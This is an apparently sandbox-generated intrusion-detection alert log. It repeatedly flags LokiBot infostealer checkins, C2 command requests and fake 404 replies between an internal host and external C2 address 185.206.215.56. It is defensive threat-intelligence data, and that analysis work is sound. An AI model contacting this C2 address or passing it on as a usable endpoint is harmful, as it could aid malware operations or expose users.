01/05/21-19:06:31.542986 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49227 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.542986 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49227 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.697483 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49227 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:31.903232 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49228 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.903232 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49228 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.903232 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49228 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:31.903232 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49228 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.053069 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49228 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:32.262786 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49229 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.262786 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49229 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.262786 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49229 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.262786 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49229 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.426688 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49229 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:32.647726 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49230 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.647726 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49230 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.647726 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49230 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.647726 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49230 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:32.815517 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49230 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:33.031393 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49231 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.031393 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49231 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.031393 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49231 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.031393 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49231 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.190810 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49231 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:33.398944 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49232 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.398944 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49232 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.398944 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49232 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.398944 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49232 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.560619 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49232 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:33.770156 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49233 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.770156 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49233 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.770156 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49233 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.770156 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49233 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:33.939742 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49233 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:34.165366 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49234 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.165366 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49234 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.165366 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49234 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.165366 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49234 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.334828 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49234 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:34.564013 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49235 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.564013 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49235 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.564013 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49235 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.564013 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49235 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.721364 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49235 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:34.935155 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49236 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.935155 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49236 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.935155 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49236 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:34.935155 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49236 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.122327 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49236 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:35.342016 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49237 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.342016 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49237 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.342016 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49237 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.342016 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49237 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.512183 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49237 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:35.726449 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49238 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.726449 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49238 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.726449 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49238 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.726449 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49238 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:35.894052 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49238 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:36.098105 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49239 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.098105 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49239 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.098105 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49239 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.098105 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49239 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.277202 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49239 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:36.491085 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49240 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.491085 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49240 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.491085 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49240 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.491085 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49240 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.657367 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49240 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:36.879808 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49241 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.879808 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49241 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.879808 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49241 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:36.879808 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49241 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.043514 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49241 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:37.256017 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49242 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.256017 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49242 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.256017 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49242 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.256017 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49242 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.425204 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49242 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:37.635343 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49243 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.635343 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49243 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.635343 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49243 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.635343 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49243 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:37.804227 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49243 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:38.018241 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49244 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.018241 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49244 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.018241 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49244 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.018241 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49244 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.186781 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49244 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:38.389239 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49245 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.389239 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49245 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.389239 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49245 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.389239 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49245 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.563167 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49245 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:38.784644 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49246 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.784644 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49246 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.784644 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49246 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.784644 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49246 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:38.965108 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49246 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:39.177876 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49247 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.177876 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49247 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.177876 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49247 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.177876 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49247 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.331864 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49247 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:39.554968 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49248 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.554968 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49248 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.554968 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49248 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.554968 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49248 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.738314 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49248 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:39.944185 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49249 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.944185 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49249 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.944185 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49249 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:39.944185 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49249 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.121556 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49249 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:40.335810 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49250 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.335810 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49250 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.335810 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49250 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.335810 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49250 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.507894 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49250 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:40.714092 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49251 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.714092 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49251 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.714092 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49251 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.714092 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49251 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.893523 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49251 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:41.109834 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.109834 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.109834 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.109834 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.281018 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49252 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:41.488492 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.488492 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.488492 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.488492 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.665959 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49253 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:41.875312 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.875312 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.875312 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.875312 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.043815 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49254 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:42.266645 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.266645 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.266645 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.266645 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.432654 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49255 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:42.638995 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.638995 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.638995 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.638995 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.805691 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49256 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:43.011253 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.011253 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.011253 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.011253 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.168522 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49257 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:43.372296 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.372296 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.372296 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.372296 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.526493 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49258 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:43.756835 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.756835 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.756835 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.756835 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.913405 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49259 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:44.120266 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.120266 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.120266 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.120266 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.276026 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49260 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:44.485788 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.485788 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.485788 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.485788 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.652260 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49261 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:44.876902 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.876902 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.876902 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.876902 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.053688 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49262 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:45.261637 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.261637 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.261637 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.261637 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.422623 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49263 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:45.633934 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.633934 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.633934 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
